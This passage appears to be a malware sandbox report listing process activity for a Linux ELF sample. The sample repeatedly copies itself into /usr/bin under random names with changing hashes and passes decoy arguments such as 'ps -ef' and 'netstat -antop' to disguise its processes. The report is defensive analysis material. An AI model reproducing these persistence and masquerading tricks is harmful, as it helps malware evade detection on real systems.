MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6458, Parent PID: 6457

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: wutujskjnm PID: 6458, Parent PID: 6457

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	/usr/bin/wutujskjnm su 6261
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: wutujskjnm PID: 6462, Parent PID: 6458

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	-
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6460, Parent PID: 6261

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6461, Parent PID: 6460

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: wutujskjnm PID: 6461, Parent PID: 6460

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	/usr/bin/wutujskjnm su 6261
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: wutujskjnm PID: 6465, Parent PID: 6461

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	-
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6463, Parent PID: 6261

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6464, Parent PID: 6463

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: wutujskjnm PID: 6464, Parent PID: 6463

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	/usr/bin/wutujskjnm top 6261
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: wutujskjnm PID: 6466, Parent PID: 6464

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	-
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6471, Parent PID: 6261

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6472, Parent PID: 6471

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: qxzsiorokf PID: 6472, Parent PID: 6471

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	/usr/bin/qxzsiorokf who 6261
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: qxzsiorokf PID: 6473, Parent PID: 6472

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	-
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6474, Parent PID: 6261

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6475, Parent PID: 6474

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: qxzsiorokf PID: 6475, Parent PID: 6474

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	/usr/bin/qxzsiorokf sh 6261
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: qxzsiorokf PID: 6478, Parent PID: 6475

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	-
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6476, Parent PID: 6261

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6477, Parent PID: 6476

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: qxzsiorokf PID: 6477, Parent PID: 6476

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	/usr/bin/qxzsiorokf "cd /etc" 6261
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: qxzsiorokf PID: 6480, Parent PID: 6477

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	-
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6479, Parent PID: 6261

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6481, Parent PID: 6479

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: qxzsiorokf PID: 6481, Parent PID: 6479

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	/usr/bin/qxzsiorokf "ps -ef" 6261
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: qxzsiorokf PID: 6484, Parent PID: 6481

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	-
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6482, Parent PID: 6261

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6483, Parent PID: 6482

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: qxzsiorokf PID: 6483, Parent PID: 6482

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	/usr/bin/qxzsiorokf "grep \"A\"" 6261
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: qxzsiorokf PID: 6485, Parent PID: 6483

General

Start time (UTC):	14:28:49
Start date (UTC):	03/01/2025
Path:	/usr/bin/qxzsiorokf
Arguments:	-
File size:	548649 bytes
MD5 hash:	d660d3565aa30310004c75f37e3fe19f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6488, Parent PID: 6261

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6489, Parent PID: 6488

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6489, Parent PID: 6488

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	/usr/bin/uzqdvpyngy "netstat -antop" 6261
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6490, Parent PID: 6489

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	-
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6491, Parent PID: 6261

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6492, Parent PID: 6491

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6492, Parent PID: 6491

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	/usr/bin/uzqdvpyngy pwd 6261
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6495, Parent PID: 6492

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	-
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6493, Parent PID: 6261

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6494, Parent PID: 6493

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6494, Parent PID: 6493

General

Start time (UTC):	14:28:54
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	/usr/bin/uzqdvpyngy gnome-terminal 6261
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6499, Parent PID: 6494

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	-
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6496, Parent PID: 6261

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6497, Parent PID: 6496

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6497, Parent PID: 6496

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	/usr/bin/uzqdvpyngy "ps -ef" 6261
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6501, Parent PID: 6497

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	-
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6498, Parent PID: 6261

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6500, Parent PID: 6498

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6500, Parent PID: 6498

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	/usr/bin/uzqdvpyngy bash 6261
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: uzqdvpyngy PID: 6502, Parent PID: 6500

General

Start time (UTC):	14:28:55
Start date (UTC):	03/01/2025
Path:	/usr/bin/uzqdvpyngy
Arguments:	-
File size:	548649 bytes
MD5 hash:	53241e7c3d48f7919dc80796d016a705

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6505, Parent PID: 6261

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6506, Parent PID: 6505

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bgoiqqymph PID: 6506, Parent PID: 6505

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	/usr/bin/bgoiqqymph "ls -la" 6261
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: bgoiqqymph PID: 6507, Parent PID: 6506

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	-
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6508, Parent PID: 6261

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6509, Parent PID: 6508

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bgoiqqymph PID: 6509, Parent PID: 6508

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	/usr/bin/bgoiqqymph sh 6261
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: bgoiqqymph PID: 6511, Parent PID: 6509

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	-
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6510, Parent PID: 6261

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6512, Parent PID: 6510

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bgoiqqymph PID: 6512, Parent PID: 6510

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	/usr/bin/bgoiqqymph "sleep 1" 6261
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: bgoiqqymph PID: 6515, Parent PID: 6512

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	-
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6513, Parent PID: 6261

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6514, Parent PID: 6513

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bgoiqqymph PID: 6514, Parent PID: 6513

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	/usr/bin/bgoiqqymph ifconfig 6261
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: bgoiqqymph PID: 6518, Parent PID: 6514

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	-
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6516, Parent PID: 6261

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6517, Parent PID: 6516

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bgoiqqymph PID: 6517, Parent PID: 6516

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	/usr/bin/bgoiqqymph who 6261
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: bgoiqqymph PID: 6519, Parent PID: 6517

General

Start time (UTC):	14:29:00
Start date (UTC):	03/01/2025
Path:	/usr/bin/bgoiqqymph
Arguments:	-
File size:	548649 bytes
MD5 hash:	36dfbcd1cb8fb95125af217877d82a82

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6525, Parent PID: 6261

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6526, Parent PID: 6525

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6526, Parent PID: 6525

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	/usr/bin/uhjkqkcgma pwd 6261
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6527, Parent PID: 6526

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	-
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6528, Parent PID: 6261

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6529, Parent PID: 6528

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6529, Parent PID: 6528

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	/usr/bin/uhjkqkcgma "cd /etc" 6261
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6532, Parent PID: 6529

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	-
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6530, Parent PID: 6261

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6531, Parent PID: 6530

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6531, Parent PID: 6530

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	/usr/bin/uhjkqkcgma uptime 6261
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6535, Parent PID: 6531

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	-
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6533, Parent PID: 6261

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6534, Parent PID: 6533

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6534, Parent PID: 6533

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	/usr/bin/uhjkqkcgma gnome-terminal 6261
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6538, Parent PID: 6534

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	-
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6536, Parent PID: 6261

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6537, Parent PID: 6536

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6537, Parent PID: 6536

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	/usr/bin/uhjkqkcgma "cat resolv.conf" 6261
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: uhjkqkcgma PID: 6539, Parent PID: 6537

General

Start time (UTC):	14:29:06
Start date (UTC):	03/01/2025
Path:	/usr/bin/uhjkqkcgma
Arguments:	-
File size:	548649 bytes
MD5 hash:	9d2be3b2e820cf7206aad0dc28d827dd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6542, Parent PID: 6261

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6543, Parent PID: 6542

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: ksagqhmoao PID: 6543, Parent PID: 6542

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	/usr/bin/ksagqhmoao pwd 6261
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: ksagqhmoao PID: 6544, Parent PID: 6543

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	-
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6545, Parent PID: 6261

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6546, Parent PID: 6545

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: ksagqhmoao PID: 6546, Parent PID: 6545

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	/usr/bin/ksagqhmoao "ls -la" 6261
File size:	548649 bytes
